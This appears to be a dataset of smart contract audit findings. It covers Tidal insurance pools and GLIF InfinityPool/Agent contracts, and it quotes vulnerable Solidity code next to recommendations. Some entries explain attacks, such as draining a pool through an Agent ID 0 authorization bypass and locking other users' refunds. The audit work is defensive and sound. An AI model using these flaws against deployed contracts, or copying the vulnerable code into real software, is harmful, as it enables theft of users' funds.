= incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n -refund - Attacker Can Lock Insurance Holder's Refunds by Calling refund Before a Refund Was Allocatedчhighч`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\nчThere should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.чч```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n -addTidal, _updateUserTidal, withdrawTidal - Wrong Arithmetic CalculationsчhighчTo further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.чImplement the fixes described above. The versions without `SafeMath` are easier to read and should be preferred; see issue 3.13.чч```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n -claim - Incomplete and Lenient ImplementationчhighчIn the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\nчTo ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.чч```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n -buy - Insurance Buyers Trying to Increase Their Coverage Amount Will Lose Their Previous CoverageчhighчWhen a user is willing to `buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\nчThe coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.чч```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n -Several Issues Related to Upgradeability of ContractsчmediumчWe did not find a proxy contract or factory in the repository, but the README contains the following information:\\nREADME.md:L11\\n```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n\\nREADME.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitalized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.чRefamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.чч```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n -initialize - Committee Members Array Can Contain DuplicatesчmediumчThe initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.чThe `initialize` function should verify in the loop that `member` hasn't been added before. Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.чч```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n -Pool.buy- Users May End Up Paying More Than Intended Due to Changes in policy.weeklyPremiumчmediumчThe price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\nчConsider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.чч```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n -Missing Validation Checks in executeчmediumчThe `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now changeCommitteeThresholdis called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\nчApply the same validation checks in the functions that execute the state change.чч```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n -Hard-Coded Minimum Deposit AmountчlowчResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g. USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, \"Not enabled\");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, \"Less than minimum\");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.чThe minimum deposit amount should be configurable.чч```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n -Outdated Solidity VersionчlowчThe source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.чResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.чч```\\npragma solidity 0.8.10;\\n```\\n -Code Used for Testing Purposes Should Be Removed Before DeploymentчlowчVariables and logic have been added to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\nчFor the long term, consider mimicking this behavior by using features offered by your testing framework.чч```\\nmodifier onlyTest() {\\n```\\n -Missing EventsчlowчSome state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. `Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. `Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\nчState-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.чч```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n -InfinityPool contract authorization bypass attackчhighчAn attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.чEnsure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -Wrong accounting for totalBorrowed in the InfinityPool.writeOff functionчhighчHere is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.чResolution\\nFixed.чч```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n -The beneficiaryWithdrawable function can be called by anyoneчhighчThe `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue is that anyone can call this function directly, and the quota will be reduced without funds being transferred.чEnsure only the Agent can call this function.чч```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n -An Agent can borrow even with existing debt in interest paymentsчmediumчTo `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.чEnsure the debt is paid when borrowing more funds.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -The AgentPolice.distributeLiquidatedFunds() function can have undistributed residual fundsчmediumчWhen an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.чReturn the residual funds to the Agent's owner or process them in some way so they are not lost.чч```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n -An Agent can be upgraded even if there is no new implementationчmediumчAgents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.чEnsure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -Potential re-entrancy issues when upgrading the contractsчlowчThe protocol doesn't have any built-in re-entrancy protection mechanisms. That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.чBe very cautious with further implementations of agents and pools. Also, consider using reentrancy protection in public functions.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new 